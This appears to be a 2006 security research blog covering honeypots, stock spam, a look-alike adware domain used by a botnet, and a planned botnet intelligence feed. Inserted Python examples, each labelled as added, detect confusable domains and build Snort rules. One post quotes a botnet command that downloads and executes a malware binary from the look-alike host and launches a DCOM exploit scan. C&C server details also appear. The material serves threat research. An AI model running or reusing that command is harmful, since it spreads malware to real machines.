"My Robot Brain Needs Beer"

Sunday, November 26. 2006
Yesterday I arrived in Tokyo for PacSec, where I'll teach a Dojo on honeypots next week. The agenda looks pretty interesting; I'm looking forward to the talk on the malware landscape by some Microsoft guys, and to the talks on Vista and IPv6.

The web-decoy honeypot, which is designed to collect information about attacks against web applications, now has a web frontend and can draw pretty pictures. The figure below is an example of the SQL attacks we monitored against one particular honeypot that runs phpMyAdmin.

We should have a web frontend with statistics for everyone in the next couple of weeks.

"$NAME message" | "It me $NAME" | "Me again $NAME" | "$NAME wrote"

Friday, November 24. 2006
Perhaps you have seen some stock spam messages in your inbox recently that carry one of the subjects from the title. Those spam waves belong to advertising "campaigns" for CNPM, GAMN, and NSLT (once with GIF images and once with only text in the message body). It is pretty interesting to see that stock spam is still around, and the volume seems to be rising. Is that an indication that stock spam is really a lucrative business? If not, the spammers presumably would have stopped those campaigns... Seems like our study on "The Effect of Stock Spam on Financial Markets" was not completely wrong :-)

doIIarrevenue.com

Thursday, November 23. 2006
Vitalsecurity.org has an interesting article entitled "Beware of DoiiarRevenue.com: Mimicking an Adware vendor for fun and profit". Some time ago I also stumbled across this domain while tracking a botnet whose command channel carries the following topic, which is executed by every bot that joins the channel:
:.t kill all |.db http://promo.doIIarrevenue.com/webmasterexe/drsmartload195a.exe 
c:\drsmartload195a.exe r |.advscan dcom135 100 3 0 -b -r

Instead of the usual promo.dollarrevenue.com link to a drsmartload.exe file, this botnet uses the doiiarrevenue.com site (note the two "i"s, or capital "I"s, in place of "ll"):
$ host dollarrevenue.com
dollarrevenue.com has address 194.187.45.56
dollarrevenue.com mail is handled by 10 MAIL.dollarrevenue.com.

$ host doiiarrevenue.com
doiiarrevenue.com has address 68.142.212.122
doiiarrevenue.com has address 68.142.212.117
doiiarrevenue.com has address 68.142.212.118
doiiarrevenue.com has address 68.142.212.119
doiiarrevenue.com has address 68.142.212.120
doiiarrevenue.com has address 68.142.212.121
doiiarrevenue.com mail is handled by 20 mx1.biz.mail.yahoo.com.
doiiarrevenue.com mail is handled by 30 mx5.biz.mail.yahoo.com.
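The look-alike trick above (two "i"s standing in for "ll") is easy to miss by eye but simple to catch mechanically. The following is an added example, not code from the original post: it folds visually confusable characters before comparing a hostname against a list of known domains. The confusable table, the two-label "registered domain" rule and the function names are assumptions.

```python
# Added example (not from the original post): flag hostnames that mimic a known
# domain by swapping visually confusable characters, the way doIIarrevenue.com
# ("I"/"i" for "l") mimics dollarrevenue.com. The confusable table is an assumption.
import re

# One-character look-alikes folded to a representative; "i" is folded to "l"
# deliberately because lowercase "ii" is what the resolver output above shows.
SINGLE = str.maketrans({"i": "l", "1": "l", "|": "l", "0": "o", "5": "s", "$": "s"})
# Multi-character look-alikes, applied after the single-character fold.
MULTI = (("rn", "m"), ("vv", "w"), ("cl", "d"))

def registered_domain(host):
    """Last two labels of a hostname (no public-suffix list; an assumption)."""
    return ".".join(host.strip().rstrip(".").lower().split(".")[-2:])

def skeleton(host):
    """Fold a registered domain to a confusable-insensitive form."""
    s = registered_domain(host).translate(SINGLE)
    for multi, one in MULTI:
        s = s.replace(multi, one)
    return s

def lookalike(host, known):
    """Return the known domain that `host` imitates, or None if it is genuine
    (same registered domain) or simply unrelated."""
    target = skeleton(host)
    for k in known:
        if registered_domain(host) != registered_domain(k) and target == skeleton(k):
            return k
    return None

URL_HOST = re.compile(r"https?://([^/\s:]+)")

def flag_urls(text, known):
    """Check the host of every URL in a line (e.g. an IRC channel topic)."""
    hits = []
    for host in URL_HOST.findall(text):
        k = lookalike(host, known)
        if k:
            hits.append((host, k))
    return hits
```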


Via the passive DNS replication service of RUS CERT it is quite obvious that these IPs are also used for other purposes: the service returns a long list of other domains whose A records point to 68.142.212.122.


So, what is going on here? The only thing I can say at the moment is that doiiarrevenue.com also hosts a file called vv663.exe, which is clearly malicious, as the analysis by CWSandbox shows (report in XML format).

Live Botnet Feed

Thursday, November 23. 2006
We are currently preparing a "live" botnet feed: when we detect a botnet during malware analysis with CWSandbox, we send out an e-mail that contains some information about it. A (sanitized) sample report looks like this:
file 6908ef042be18d741f943b60eb25bf00.exe, filesize 102400
DNS Lookup
IP Adress: XXX.125.184.YYY
Host Name: BAR.FOO.us
C&C Server: XXX.125.184.YYY:6667 (successful)
Server Password:
Username: XP-438902
Nickname: XP-438902
Channel: #dad
Channelpassword: pass

This kind of information should help network administrators, and perhaps other security-minded people as well, to protect their networks and environments. If you are interested in such a feed, please contact me (thorsten [dot] holz [at] gmail [dot] com).

BTW: the above-mentioned botnet is still live after a couple of weeks. Some details about it:
:RE 001 XP-438902 :Welcome to the RE server XP-438902
:RE 002 XP-438902 :Your host is RE, running version 5.5.2453
:RE 003 XP-438902 :This server was created Sep 9 2000 at 01:20:51 PDT
:RE 004 XP-438902 RE 5.5.2453 aioxz abcdefhiklmnoprstuvxyz
:RE 251 XP-438902 :There are 2760 users and 2705 invisible on 1 servers
:RE 252 XP-438902 2 :operator(s) online
:RE 253 XP-438902 4 :unknown connection(s)
:RE 254 XP-438902 17 :channels formed
:RE 255 XP-438902 :I have 2760 clients and 0 servers
:RE 265 XP-438902 :Current local users: 2760 Max: 7967
:RE 266 XP-438902 :Current global users: 2760 Max: 7967
:RE 422 XP-438902 :MOTD File is missing
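For an administrator receiving the feed, the two pieces of text above (the sanitized report and the IRC numeric replies) are the raw material for a block rule and for a size estimate. The following is an added example and not the blog author's feed tooling: it parses the report format shown, derives a Snort rule for the C&C endpoint, and reads the client counts out of the 251/265 numerics. The sample report is constructed from the sanitized text above (XXX/YYY placeholders kept), and the rule format and function names are assumptions.

```python
# Added example, not the blog author's feed tooling: parse a sanitized feed
# report, derive a Snort rule for the C&C endpoint, read IRC numeric replies.
import re

SAMPLE_REPORT = """file 6908ef042be18d741f943b60eb25bf00.exe, filesize 102400
DNS Lookup
IP Adress: XXX.125.184.YYY
Host Name: BAR.FOO.us
C&C Server: XXX.125.184.YYY:6667 (successful)
Server Password:
Username: XP-438902
Nickname: XP-438902
Channel: #dad
Channelpassword: pass
"""  # constructed from the sanitized sample above; XXX/YYY are its placeholders

def parse_report(text):
    """Map each 'Key: value' line to a dict entry; empty values stay ''."""
    fields = {}
    for line in text.splitlines():
        key, sep, value = line.partition(":")
        if sep:  # lines without a colon ('file ...', 'DNS Lookup') carry no field
            fields[key.strip()] = value.strip()
    return fields

def cnc_endpoint(fields):
    """Split 'host:port (status)' into (host, port, status)."""
    m = re.match(r"(\S+):(\d+)\s*\((\w+)\)", fields["C&C Server"])
    return m.group(1), int(m.group(2)), m.group(3)

def snort_rule(fields, sid):
    """Alert on any internal host talking to the reported C&C endpoint."""
    host, port, _ = cnc_endpoint(fields)
    return (f'alert tcp $HOME_NET any -> {host} {port} (msg:"IRC bot C&C '
            f'{fields["Host Name"]} channel {fields["Channel"]}"; '
            f'flow:to_server,established; sid:{sid}; rev:1;)')

def irc_stats(lines):
    """Read client counts from RPL_LUSERCLIENT (251) and RPL_LOCALUSERS (265)."""
    stats = {}
    for line in lines:
        m = re.match(r"^:\S+ (\d{3}) \S+ :?(.*)$", line)
        if m and m.group(1) == "251":
            u, inv, srv = re.search(r"(\d+) users and (\d+) invisible on (\d+)", m.group(2)).groups()
            stats.update(users=int(u), invisible=int(inv), servers=int(srv))
        elif m and m.group(1) == "265":
            cur, mx = re.search(r"users: (\d+) Max: (\d+)", m.group(2)).groups()
            stats.update(local_users=int(cur), max_users=int(mx))
    return stats
```

The sanitized sample keeps the XXX/YYY placeholders, so the generated rule is only valid once the real feed address is substituted.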

Using Nepenthes Honeypots to Detect Common Malware

Tuesday, November 21. 2006
A blog entry I almost forgot about: a few days ago, Jamie Riden from the New Zealand Honeynet Project published an article on SecurityFocus entitled "Using Nepenthes Honeypots to Detect Common Malware". The article introduces nepenthes and explains how to install and configure it. The results are interesting:

The New Zealand Honeynet Project installed a Nepenthes honeypot using version 0.17 running on Debian unstable. This was listening on 255 IP addresses, a /24 network prefix. Over a period of five days, it had collected 74 different samples as distinguished by the MD5 hashes of the binaries. Of these, only 48 were identified as malware by a particular antivirus product at the end of the five-day period. Of the known samples, many were worms such as Korgo, Doomjuice, Sasser and Mytob. The rest were IRC bots of one sort or another, like SDBot, Spybot, Mybot and Gobot. The majority of binaries, whether classified as worms or bots, had some kind of IRC backdoor functionality. Further analysis of these samples can also be performed by the reader as desired.